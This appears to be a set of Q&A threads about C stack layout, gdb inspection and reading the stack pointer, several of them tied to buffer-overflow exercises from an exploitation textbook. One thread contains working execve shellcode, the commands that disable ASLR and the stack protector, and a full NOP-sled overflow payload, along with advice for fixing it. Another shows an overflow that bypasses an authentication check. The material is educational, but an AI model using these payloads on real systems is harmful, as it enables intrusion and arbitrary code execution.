Is gcc reordering local variables at compilation time?

I'm currently reading (for the second time) "Hacking : The Art of Exploitation" and have stumbled on something.
The book suggests two different ways to exploit these two similar programs : auth_overflow and auth_overflow2
In the first one, there is a password checking function laid out like this:
int check_authentication(char *password) {
int auth_flag = 0;
char password_buffer[16];
strcpy(password_buffer, password);
...
}
Entering more than 16 ASCII characters changes the value of auth_flag to something greater than 0, thus bypassing the check, as shown in this gdb output:
gdb$ x/12x $esp
0xbffff400: 0xffffffff 0x0000002f 0xb7e0fd24 0x41414141
0xbffff410: 0x41414141 0x41414141 0x41414141 0x00000001
0xbffff420: 0x00000002 0xbffff4f4 0xbffff448 0x08048556
password_buffer # 0xbffff40c
auth_flag # 0xbffff41c
The second program inverts the two variables :
int check_authentication(char *password) {
char password_buffer[16];
int auth_flag = 0;
strcpy(password_buffer, password);
...
}
The author then suggests that it's not possible to overflow into auth_flag, which I really believed. I then proceeded to overflow the buffer, and to my surprise, it still worked. The auth_flag variable was still sitting after the buffer, as you can see in this gdb output:
gdb$ x/12x $esp
0xbffff400: 0xffffffff 0x0000002f 0xb7e0fd24 0x41414141
0xbffff410: 0x41414141 0x41414141 0x41414141 0x00000001
0xbffff420: 0x00000002 0xbffff4f4 0xbffff448 0x08048556
password_buffer # 0xbffff40c
auth_flag # 0xbffff41c
I'm wondering whether gcc is reordering local variables for alignment or optimization purposes.
I tried compiling with the -O0 flag, but the result is the same.
Does anyone know why this is happening?
Thanks in advance.

The compiler authors are completely free to implement any allocation scheme for local variables with automatic storage. auth_flag could be set before or after password_buffer on the stack, it could be in a register, it could be elided completely if proper analysis of the code allows it. There might not even be a stack... The only guarantee the Standard gives you is this:
strcpy(password_buffer, password); invokes undefined behavior if the source string including its null terminator is longer than the destination array password_buffer. Whether this undefined behavior fits your needs is completely outside of the language specification.
As a matter of fact, some implementors purposely complicate the task of would be hackers by randomizing the behavior in cases such as the posted code.
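To see what a particular compiler actually did, rather than what the source order suggests, you can print the distance between the two locals. This is only a sketch: the helper names local_offset and print_local_offset are made up for illustration, and the number it reports can change with the compiler, its version, and flags such as -fstack-protector.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: returns (address of auth_flag) minus
   (address of password_buffer) in bytes, for this build only. */
intptr_t local_offset(void)
{
    /* volatile keeps both objects in memory so they have real addresses */
    volatile char password_buffer[16] = {0};
    volatile int auth_flag = 0;

    intptr_t buf  = (intptr_t)&password_buffer[0];
    intptr_t flag = (intptr_t)&auth_flag;

    /* Two distinct live objects never share an address. */
    assert(flag != buf);
    return flag - buf;
}

/* A positive result means auth_flag sits above the buffer in memory;
   a negative result means it sits below it. */
void print_local_offset(void)
{
    printf("auth_flag - password_buffer = %lld bytes\n",
           (long long)local_offset());
}
```

Calling print_local_offset() from main in builds with and without -fno-stack-protector is one way to compare the layouts the compiler picks.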

I had the same problem. To fix this, put the two variables in a struct. In a struct, the fields are always laid out in the order in which they are declared. Be aware that the order is reversed.
struct myStruct {
int auth_flag;
char password_buffer[16];
};
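The declaration-order guarantee can be checked with offsetof. The sketch below reuses the struct from this answer; the function name print_member_offsets is just an illustration. The exact offset of password_buffer depends on padding, but it can never come before auth_flag.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

struct myStruct {
    int auth_flag;
    char password_buffer[16];
};

/* Prints where each member lives inside the struct. */
void print_member_offsets(void)
{
    /* The first member of a struct is always at offset 0. */
    assert(offsetof(struct myStruct, auth_flag) == 0);

    printf("auth_flag       at offset %zu\n",
           offsetof(struct myStruct, auth_flag));
    printf("password_buffer at offset %zu\n",
           offsetof(struct myStruct, password_buffer));
}
```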

I know that's an old question.
But in my case the -fno-stack-protector flag did the trick.
So if I compile with -fno-stack-protector, local variables are ordered as expected (at least for this simple program).
I wonder whether the reordering is meant as some sort of protection.
Here I found link about that


What is in the address of main?

A simple piece of code like this
#include<stdio.h>
int main()
{
return 0;
}
When I check the value at "&main" with gdb, I get 0xe5894855. What is this?
(gdb) x/x &main
0x401550 <main>: 0xe5894855
(gdb)
0xe5894855 is the machine code of the first instructions in main. Because you used x/x, gdb displays those bytes as a single hex number, and they appear backwards because x86-64 is little-endian. 55 is the opcode for push rbp, the first instruction of main. Use x/i &main to view the instructions instead.
The C expression &main evaluates to a pointer to (function) main.
The gdb command
x/x &main
prints (eXamines) the value stored at the address expressed by &main, in hexadecimal format (/x). The result in your case is 0xe5894855, but the C language does not specify the significance of that value. In fact, C does not define any strictly conforming way even to read it from inside the program.
In practice, that value probably represents the first four bytes of the function's machine code, interpreted as a four-byte unsigned integer in native byte order. But that depends on implementation details both of GDB and of the C implementation involved.
Ok so the 0x401550 is the address of main() and the hex goo to the right is the "contents" of that address, which doesn't make much sense since it's code stored there, not data.
To explain what that hex goo is coming from, we can toy around with some artificial examples:
#include <stdio.h>
int main (void)
{
printf("%llx\n", (unsigned long long)&main);
}
Running this code on gcc x86_64, I get 401040 which is the address of main() on my particular system (this time). Then upon modifying the example into some ugly hard coding:
#include <stdio.h>
int main (void)
{
printf("%llx\n", (unsigned long long)&main);
printf("%.8x\n", *(unsigned int*)0x401040);
}
(Please note that accessing absolute addresses of program code memory like this is dirty hacking. It is very questionable practice and some systems might raise a hardware exception if you attempt it.)
I get
401040
08ec8348
The gibberish second line is something similar to what gdb would give: the raw op codes for the instructions stored there.
(That is, it's actually a program that prints out the machine code used for printing out the machine code... and now my head hurts...)
Upon disassembly and generating a binary of the executable, then viewing numerical op codes with annotated assembly, I get:
main:
48 83 ec 08
401040 sub rsp,0x8
Here 48 83 ec 08 is the raw machine code for the sub instruction together with its operands (x86 assembler isn't exactly my forte, but I believe 48 is a REX prefix and 83 is the opcode shared by a group of arithmetic instructions that take an 8-bit immediate, with the following byte ec selecting sub and rsp). When these bytes are printed as if they were integer data rather than machine code, x86 little-endian ordering reverses them from 48 83 ec 08 to 08 ec 83 48. And that's the hex gibberish 08ec8348 from before.
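The byte reversal described in these answers can be reproduced without touching code memory at all. The sketch below assembles four bytes into a 32-bit value the way a little-endian load would; read_le32 and show_prologue_words are illustrative names, and the byte sequences are the ones quoted above.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Combine four bytes into a 32-bit value, lowest address first,
   which is what a little-endian CPU does on a 4-byte load. */
uint32_t read_le32(const unsigned char *bytes)
{
    assert(bytes != NULL);
    return (uint32_t)bytes[0]
         | (uint32_t)bytes[1] << 8
         | (uint32_t)bytes[2] << 16
         | (uint32_t)bytes[3] << 24;
}

void show_prologue_words(void)
{
    /* push rbp; mov rbp,rsp  (the bytes gdb showed at &main) */
    const unsigned char gdb_bytes[4] = {0x55, 0x48, 0x89, 0xe5};
    /* sub rsp,0x8  (the bytes from the disassembly above) */
    const unsigned char sub_bytes[4] = {0x48, 0x83, 0xec, 0x08};

    printf("%08x\n", (unsigned)read_le32(gdb_bytes)); /* e5894855 */
    printf("%08x\n", (unsigned)read_le32(sub_bytes)); /* 08ec8348 */
}
```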

Buffer Overflow not spawning shell?

(I know there are many answers on this already, but I need help.)
As far as I know, a buffer overflow can be mitigated by ASLR, stack canaries, or a non-executable stack. So for testing purposes I disabled ASLR with sysctl -w kernel.randomize_va_space=0, disabled stack canaries with -fno-stack-protector, and made the stack executable with -z execstack.
Now to confirm these I did:
ASLR
root#kali:/tmp# cat /proc/sys/kernel/randomize_va_space
0
Executable stack: readelf -l vuln2
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RWE 0x10
Other info that might help:
root#kali:/tmp# file vuln2
vuln2: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=8102b60ffa8c26f231e4184d2f49b2e7c26a18b9, not stripped
CPU architecture is little endian:
root#kali:/tmp# lscpu | grep 'Byte Order'
Byte Order: Little Endian
program:
#include <stdio.h>
int main(int argc, char *argv[]){
char buf[512];
strcpy(buf, argv[1]);
return 0;
}
Compilation:
gcc -o vuln2 vuln2.c -fno-stack-protector -z execstack
Shellcode (25 bytes):
\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05
Does the shellcode work, though? Yes, it does. Compiling and running this spawns a shell:
#include <sys/mman.h>
#include <stdint.h>
char code[] = "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05";
int main(){
mprotect((void *)((uint64_t)code & ~4095), 4096, PROT_READ|PROT_EXEC);
(*(void(*)()) code)();
return 0;
}
How do I exploit it?
Well, I need 526 bytes to overwrite RIP:
(gdb) r $(python -c 'print "A"*526')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/vuln2 $(python -c 'print "A"*526')
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
(gdb) x/x $rip
0x414141414141: Cannot access memory at address 0x414141414141
Stack start address: 0x7fffffffdd70
(gdb) x/100x $rsp
0x7fffffffdd60: 0xffffe058 0x00007fff 0xf7fd3298 0x00000002
0x7fffffffdd70: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdd80: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdd90: 0x41414141 0x41414141 0x41414141 0x41414141
RBP Address:
(gdb) x/x $rbp
0x7fffffffdf70: 0x41414141
Now, to build the exploit, we subtract 6 bytes from 526 for the return address and another 25 for the shellcode, which leaves 526-6-25=495 bytes of padding.
Final Exploit:
(gdb) r $(python -c 'print "\x90"*495+"\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"+"\x90\xdd\xff\xff\xff\x7f"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/vuln2 $(python -c 'print "\x90"*495+"\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"+"\x90\xdd\xff\xff\xff\x7f"')
Program received signal SIGILL, Illegal instruction.
0x00007fffffffdf73 in ?? ()
Is there any mistake that I am making?
1) I have the same issue. It happens when the return address on the stack is
overwritten by the shellcode and the replacement address is not a valid
address.
After you get this error, type x/400xw $rsp and choose a valid address and the correct
padding from the stack dump.
You're welcome.
0x00007fffffffdf73 cannot be a valid address because you are in 64 bits mode
and this address isn't 8 bytes aligned.
no word starts from this address.
For example,
0x7fffffffdf70: 0x41414141 0x41414141 0x41414141 0x41414141
If you try to access to 0x7fffffffdf73 , you retrieve a first word (from left) and 3-nth byte from right
(because little endian, MSB is on the right) .
So, you have to choose an address like 0x7fffffffdf70 or 0x7fffffffdf74 or
0x7fffffffdf78 etc... (last digit of address multiple of 4)

Different buffer length in gdb

I am trying to exploit the following program :
#include <string.h>
int main(int argc, char *argv[]) {
char little_array[512];
if (argc > 1)
strcpy(little_array, argv[1]);
}
I want to first find the buffer length in order to overflow the stack so I use
(gdb) x/20xw $esp-532
0xffffcda8: 0x00000001 0x00000000 0x41414141 0x41414141
0xffffcdb8: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcdc8: 0x00000041 0xf7fe6b8c 0xf7ffd000 0x00000000
0xffffcdd8: 0xffffce98 0xf7fe70db 0xf7ffdaf0 0xf7fd8e08
0xffffcde8: 0x00000001 0x00000001 0x00000000 0xf7ff55ac
(gdb)
And I find the address (since I ran 'AAAA'), so the address is 0xffffcdaa.
I'm running a 64-bit system with ASLR disabled.
And I defined the buffer to be 512 bytes long.
And I get
(gdb) p 0xffffddf0 - 0xffffcdaa
$1 = 4166
(gdb)
How can this be? Does it have something to do with my 64-bit system? I'm trying to follow an old book and can't really find anything better.
I used this program to find the starting point
// find_start.c
unsigned long find_start(void)
{
__asm__("movl %esp, %eax");
}
int main()
{
printf("0x%x\n",find_start());
}
(when this program compiled with the -m32 flag the output of it gives me a starting point that gives me a little better result, 574, but still is too far)

How does the stack frame look like in my function?

I am a beginner at assembly, and I am curious to know what the stack frame looks like here, so that I can access the argument by understanding rather than by following a recipe.
P.S.: the assembly function is process
#include <stdio.h>
# define MAX_LEN 120 // Maximal line size
extern int process(char*);
int main(void) {
char buf[MAX_LEN];
int str_len = 0;
printf("Enter a string:");
fgets(buf, MAX_LEN, stdin);
str_len = process(buf);
So, I know that when I want to access the process function's argument, which is in assembly, I have to do the following:
push ebp
mov ebp, esp ; now ebp is pointing to the same address as esp
pushad
mov ebx, dword [ebp+8]
Now I also would like someone to correct me on things I think are correct:
At the start, esp is pointing to the return address of the function, and [esp+8] is the slot in the stack under it, which is the function's argument
Since the function process has one argument and no inner declarations (not sure about the declarations) then the stack frame, from high to low, is 8 bytes for the argument, 8 bytes for the return address.
Thank you.
There's no way to tell other than by means of debugger. You are using ia32 conventions (ebp, esp) instead of x64 (rbp, rsp), but expecting int / addresses to be 64 bit. It's possible, but not likely.
Compile the program (gcc -O -g foo.c), then run with gdb a.out
#include <stdio.h>
int process(char* a) { printf("%p", (void*)a); return 0; }
int main()
{
process((char *)0xabcd1234);
}
Break at process; run; disassemble; inspect registers values and dump the stack.
- break process
- run
- disassemble
- info frame
- info args
- info registers
- x/32x $sp - 16 // to dump stack +-16 bytes in both side of stack pointer
Then add more parameters, a second subroutine or local variables with known values. Single step to the printf routine. What does the stack look like there?
You can also use gdb as calculator: what is the difference in between sp and rax ?
It's print $sp - $rax if you ever want to know.
Tickle your compiler to produce assembler output (on Unixy systems usually with the -S flag). Play around with debugging/non-debugging flags; the extra hints for the debugger might help in referring back to the source. Don't give optimization flags, since the reorganizing done by the compiler can lead to thorough confusion. Add a simple function call to your code to see how it is set up and torn down too.
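For the 32-bit prologue in the question (push ebp, then mov ebp, esp), the usual cdecl layout can be written down as a C struct so the offsets are easy to check. This is only a model under the assumption of 32-bit x86 with cdecl; the struct and function names are invented for illustration, and the code does not read the real stack. Note that every slot is 4 bytes wide, not 8.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Model of the memory starting at the address held in ebp,
   right after "push ebp; mov ebp, esp" (assumed: ia32 cdecl). */
struct cdecl_frame_model {
    uint32_t saved_ebp;       /* [ebp]     caller's ebp, pushed by the prologue */
    uint32_t return_address;  /* [ebp + 4] pushed by the call instruction */
    uint32_t first_argument;  /* [ebp + 8] pushed by the caller before the call */
};

void print_frame_model(void)
{
    /* Three 4-byte fields need no padding between them. */
    assert(sizeof(struct cdecl_frame_model) == 12);

    printf("saved ebp      at ebp+%zu\n",
           offsetof(struct cdecl_frame_model, saved_ebp));
    printf("return address at ebp+%zu\n",
           offsetof(struct cdecl_frame_model, return_address));
    printf("first argument at ebp+%zu\n",
           offsetof(struct cdecl_frame_model, first_argument));
}
```

This matches the mov ebx, dword [ebp+8] line in the question: on entry, before the prologue runs, the same argument is at [esp+4], just above the return address at [esp].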

Print out value of stack pointer

How can I print out the current value at the stack pointer in C in Linux (Debian and Ubuntu)?
I tried google but found no results.
One trick, which is not portable or really even guaranteed to work, is to simply print out the address of a local as a pointer.
void print_stack_pointer() {
void* p = NULL;
printf("%p", (void*)&p);
}
This will essentially print out the address of p, which is a good approximation of the current stack pointer.
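A compilable variant of the same trick is sketched below. It returns the address as an integer so that no pointer to a dead local escapes; the function names are illustrative, and the result is only an approximation of the stack pointer on implementations that keep locals on a stack.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Returns the address of a local variable as an integer.
   On typical implementations this lies close to the stack pointer. */
uintptr_t approx_stack_pointer(void)
{
    volatile char marker = 0;   /* volatile forces it into memory */
    uintptr_t address = (uintptr_t)&marker;
    assert(address != 0);
    return address;
}

void print_approx_stack_pointer(void)
{
    printf("approximate stack pointer: %p\n",
           (void *)approx_stack_pointer());
}
```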
There is no portable way to do that.
In GNU C, this may work for target ISAs that have a register named SP, including x86 where gcc recognizes "SP" as short for ESP or RSP.
// broken with clang, but usually works with GCC
register void *sp asm ("sp");
printf("%p", sp);
This usage of local register variables is now deprecated by GCC:
The only supported use for this feature is to specify registers for input and output operands when calling Extended asm
Defining a register variable does not reserve the register. Other than when invoking the Extended asm, the contents of the specified register are not guaranteed. For this reason, the following uses are explicitly not supported. If they appear to work, it is only happenstance, and may stop working as intended due to (seemingly) unrelated changes in surrounding code, or even minor changes in the optimization of a future version of gcc. ...
It's also broken in practice with clang where sp is treated like any other uninitialized variable.
In addition to duedl0r's answer: with GCC specifically, you could use __builtin_frame_address(0), which is GCC-specific (but not x86-specific).
This should also work on Clang (but there are some bugs about it).
Taking the address of a local (as JaredPar answered) is also a solution.
Notice that AFAIK the C standard does not require any call stack in theory.
Remember Appel's paper: garbage collection can be faster than stack allocation; A very weird C implementation could use such a technique! But AFAIK it has never been used for C.
One could dream of other techniques. And you could have split stacks (at least on recent GCC), in which case the very notion of a stack pointer makes much less sense (because then the stack is not contiguous, and could be made of many segments of a few call frames each).
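A minimal sketch of the __builtin_frame_address(0) approach follows, assuming GCC or a compatible compiler. The wrapper name current_frame_address is made up. Note that the builtin yields the frame address of the function it appears in, which is near the stack pointer but not the same value.

```c
#include <assert.h>
#include <stdio.h>

/* GCC/Clang builtin: level 0 asks for the frame of this function.
   If the wrapper gets inlined, the caller's frame is reported instead. */
void *current_frame_address(void)
{
    void *frame = __builtin_frame_address(0);
    assert(frame != NULL);
    return frame;
}

void print_frame_address(void)
{
    printf("frame address: %p\n", current_frame_address());
}
```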
On Linux you can use the proc pseudo-filesystem to print the stack pointer.
Have a look here, at the /proc/your-pid/stat pseudo-file, at the fields 28, 29.
startstack %lu
The address of the start (i.e., bottom) of the
stack.
kstkesp %lu
The current value of ESP (stack pointer), as found
in the kernel stack page for the process.
You just have to parse these two values!
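Parsing those two fields could look like the sketch below. The function name parse_stat_stack is invented, and it works on a line that has already been read, so it can be tried on any sample text. It skips past the last ')' first, because field 2 (the command name) may itself contain spaces. As far as I know, some newer kernels report kstkesp as 0 for a running process, so treat the second value with care.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Extracts field 28 (startstack) and field 29 (kstkesp) from one line
   in /proc/<pid>/stat format. Returns 0 on success, -1 if malformed. */
int parse_stat_stack(const char *line,
                     unsigned long *startstack,
                     unsigned long *kstkesp)
{
    assert(line != NULL && startstack != NULL && kstkesp != NULL);

    /* Field 2 is "(comm)"; everything after the last ')' is field 3 onward. */
    const char *p = strrchr(line, ')');
    if (p == NULL)
        return -1;
    p++;

    for (int field = 3; ; field++) {
        while (*p == ' ')
            p++;
        if (*p == '\0' || *p == '\n')
            return -1;                 /* ran out of fields */

        if (field == 28 || field == 29) {
            char *end;
            unsigned long value = strtoul(p, &end, 10);
            if (end == p)
                return -1;             /* not a number */
            if (field == 28) {
                *startstack = value;
            } else {
                *kstkesp = value;
                return 0;
            }
        }
        /* Skip the rest of the current token. */
        while (*p != ' ' && *p != '\0' && *p != '\n')
            p++;
    }
}
```

To use it on the current process, read the single line of /proc/self/stat with fopen and fgets into a buffer and pass that buffer to parse_stat_stack.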
You can also use an extended assembler instruction, for example:
#include <stdint.h>
uint64_t getsp( void )
{
uint64_t sp;
asm( "mov %%rsp, %0" : "=rm" ( sp ));
return sp;
}
For a 32 bit system, 64 has to be replaced with 32, and rsp with esp.
You have that info in the file /proc/<your-process-id>/maps, on the line where the string [stack] appears (so it is independent of the compiler or machine). The only downside of this approach is that reading that file may require root privileges (for example, for a process you do not own).
Try lldb or gdb. For example we can set backtrace format in lldb.
settings set frame-format "frame #${frame.index}: ${ansi.fg.yellow}${frame.pc}: {pc:${frame.pc},fp:${frame.fp},sp:${frame.sp}} ${ansi.normal}{ ${module.file.basename}{\`${function.name-with-args}{${frame.no-debug}${function.pc-offset}}}}{ at ${ansi.fg.cyan}${line.file.basename}${ansi.normal}:${ansi.fg.yellow}${line.number}${ansi.normal}{:${ansi.fg.yellow}${line.column}${ansi.normal}}}{${function.is-optimized} [opt]}{${frame.is-artificial} [artificial]}\n"
With that format, the fp and sp values are printed for each frame while debugging, for example:
frame #10: 0x208895c4: pc:0x208895c4,fp:0x01f7d458,sp:0x01f7d414 UIKit`-[UIApplication _handleDelegateCallbacksWithOptions:isSuspended:restoreState:] + 376
Look more at https://lldb.llvm.org/use/formatting.html
You can use setjmp. The exact details are implementation dependent, look in the header file.
#include <setjmp.h>
jmp_buf jmp;
setjmp(jmp);
printf("%08x\n", jmp[0].j_esp);
This is also handy when executing unknown code. You can check the sp before and after and do a longjmp to clean up.
If you are using msvc you can use the provided function _AddressOfReturnAddress()
It'll return the address of the return address, which is guaranteed to be the value of RSP at a function's entry. Once you return from that function, the RSP value will be increased by 8 since the return address is popped off.
Using that information, you can write a simple function that returns the current address of the stack pointer like this:
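#include <intrin.h> // _AddressOfReturnAddress (MSVC intrinsic)
#include <stdint.h>
#include <stdio.h>
// Must not be inlined, or the +8 no longer describes the caller's RSP.
uintptr_t GetStackPointer() {
return (uintptr_t)_AddressOfReturnAddress() + 0x8;
}
int main(int argc, const char *argv[]) {
uintptr_t rsp = GetStackPointer();
printf("Stack pointer: %p\n", (void *)rsp); // %p expects a void pointer
}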
On ARM Cortex-M with the CMSIS headers, you may use the following:
uint32_t msp_value = __get_MSP(); // Read Main Stack pointer
Likewise, if you want to get the PSP value:
uint32_t psp_value = __get_PSP(); // Read Process Stack pointer
If you want to use assembly language, you can also read MSP and PSP directly:
MRS R0, MSP // Read Main Stack pointer to R0
MRS R0, PSP // Read Process Stack pointer to R0
